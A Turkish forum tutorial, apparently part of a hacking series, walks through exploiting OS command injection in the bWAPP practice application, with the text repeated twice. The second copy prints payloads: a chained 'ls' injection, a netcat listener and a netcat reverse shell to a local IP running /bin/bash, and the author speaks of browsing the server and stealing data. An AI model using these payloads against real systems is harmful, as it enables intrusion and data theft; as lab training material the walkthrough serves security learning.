Merhaba serinin 5. konusu. Os Comand İnjection u low ve medium olarak hackleyeceğiz sömüreceğiz. Başlayalım.
Os Command İnjection
Komut Çalıştırma Enjeksiyonu manasına geliyor. Tıpkı php enjeksiyonunda olduğu gibi burda da bir kod çalıştırıp terminalimizde shell açabiliyoruz. Yine aynı şekilde bilgileri çalabiliyoruz. Sadece bu sefer bir php dosyası upload etmek veya url ye bir php kod yazmak yerine site de herhangi bir yere yazacağız. bWAPP açıp Os Comand İnjectionu bulup Hack basabilirsiniz.
Ulaşmak istediğimiz yer burası. Burayı bir web site bilgi toplama aracı olarak düşünün. Google yazıyoruz ve Lookoup bastığımızda bize bilgileri veriyor. Şimdi burp suite açıp burdaki isteğe bakabilirsiniz. Ben açmayacağım zaten açık var ama normalde açıktan şüphelenmek için bir tarama yapılır veya burp suite de ki gelen istekler kontrol edilir. Sumbit isteği göreceksinizdir . Şimdi site de Os Command İnjection var ise bu durumda site de tıpkı php enjeksiyonunda olduğu gibi kod çalıştırabiliriz. Örnek;
Önce google.com hakkında bilgi verip ( sitenin özelliği ) daha sonrasında ls ile görmememiz gereken bazı bilgiler görebilecekmiyiz bakalım.
Evet bakın ne güzel kod çalışıyor yani ls i bize çalıştırdı sistem. Bu bir açıktır tehlikelidir. ; ü anlatayım kısaca birden fazla kod çalıştırmamızı sağlar sadece ; değil | bu işaret de var bunu da medium da bakacağız. Peki shell nasıl açarız. Shell açmak için nc kullanarak yine bir port dinlemesi yapacağız daha sonra bu portu Os Command Enjeksiyonlu sitede çalıştırarak shell bağlantımızı elde edeceğiz. Terminali açıyoruz.
1234 portundan gelen verileri dinlemeye alıyoruz.
Sitemizde de bunu yaparak terminalde bağlantımızı elde ediyoruz.
NOT: bwapp de çalışıyor ama bazen sitelerde bash yerine sh çalışabilir.
Terminalde bağlantıyı elde ettik. Aynı şekilde cd ler ls ler ile sunucu içinde gezebiliriz verileri çalabiliriz. Terminalde kullanılmasının avantajı daha kolay olması . Sürekli kod çalıştırmak durumunda kalmıyoruz cd ve ls ler backler quitler vs. işimizi burda görüyor. CTRL + C ile çıkış yapılabilir.
Commix Aracı
Aynı işlemi yapan birde Commix Aracı var. Şimdi bazen bazı sitelerde bununla shell açılabiliyor ama bu biraz daha sonra burp suite de ki cookie alıp bu araca terminalde enjekte etmeliyiz onu da araştırabilirsiniz. Commix Os Command İnjection olarak.
Konum bu kadardı umarım yararlı olmuştur. İyi forumlar.
Os Command İnjection
Komut Çalıştırma Enjeksiyonu manasına geliyor. Tıpkı php enjeksiyonunda olduğu gibi burda da bir kod çalıştırıp terminalimizde shell açabiliyoruz. Yine aynı şekilde bilgileri çalabiliyoruz. Sadece bu sefer bir php dosyası upload etmek veya url ye bir php kod yazmak yerine site de herhangi bir yere yazacağız. bWAPP açıp Os Comand İnjectionu bulup Hack basabilirsiniz.
Ulaşmak istediğimiz yer burası. Burayı bir web site bilgi toplama aracı olarak düşünün. Google yazıyoruz ve Lookoup bastığımızda bize bilgileri veriyor. Şimdi burp suite açıp burdaki isteğe bakabilirsiniz. Ben açmayacağım zaten açık var ama normalde açıktan şüphelenmek için bir tarama yapılır veya burp suite de ki gelen istekler kontrol edilir. Sumbit isteği göreceksinizdir . Şimdi site de Os Command İnjection var ise bu durumda site de tıpkı php enjeksiyonunda olduğu gibi kod çalıştırabiliriz. Örnek;
Kod:
www.google.com;lsÖnce google.com hakkında bilgi verip ( sitenin özelliği ) daha sonrasında ls ile görmememiz gereken bazı bilgiler görebilecekmiyiz bakalım.
Evet bakın ne güzel kod çalışıyor yani ls i bize çalıştırdı sistem. Bu bir açıktır tehlikelidir. ; ü anlatayım kısaca birden fazla kod çalıştırmamızı sağlar sadece ; değil | bu işaret de var bunu da medium da bakacağız. Peki shell nasıl açarız. Shell açmak için nc kullanarak yine bir port dinlemesi yapacağız daha sonra bu portu Os Command Enjeksiyonlu sitede çalıştırarak shell bağlantımızı elde edeceğiz. Terminali açıyoruz.
Kod:
nc -nlvp 12341234 portundan gelen verileri dinlemeye alıyoruz.
Kod:
www.google.com;nc 192.168.1.9 1234 -e /bin/bashSitemizde de bunu yaparak terminalde bağlantımızı elde ediyoruz.
NOT: bwapp de çalışıyor ama bazen sitelerde bash yerine sh çalışabilir.
Terminalde bağlantıyı elde ettik. Aynı şekilde cd ler ls ler ile sunucu içinde gezebiliriz verileri çalabiliriz. Terminalde kullanılmasının avantajı daha kolay olması . Sürekli kod çalıştırmak durumunda kalmıyoruz cd ve ls ler backler quitler vs. işimizi burda görüyor. CTRL + C ile çıkış yapılabilir.
Commix Aracı
Aynı işlemi yapan birde Commix Aracı var. Şimdi bazen bazı sitelerde bununla shell açılabiliyor ama bu biraz daha sonra burp suite de ki cookie alıp bu araca terminalde enjekte etmeliyiz onu da araştırabilirsiniz. Commix Os Command İnjection olarak.
Konum bu kadardı umarım yararlı olmuştur. İyi forumlar.
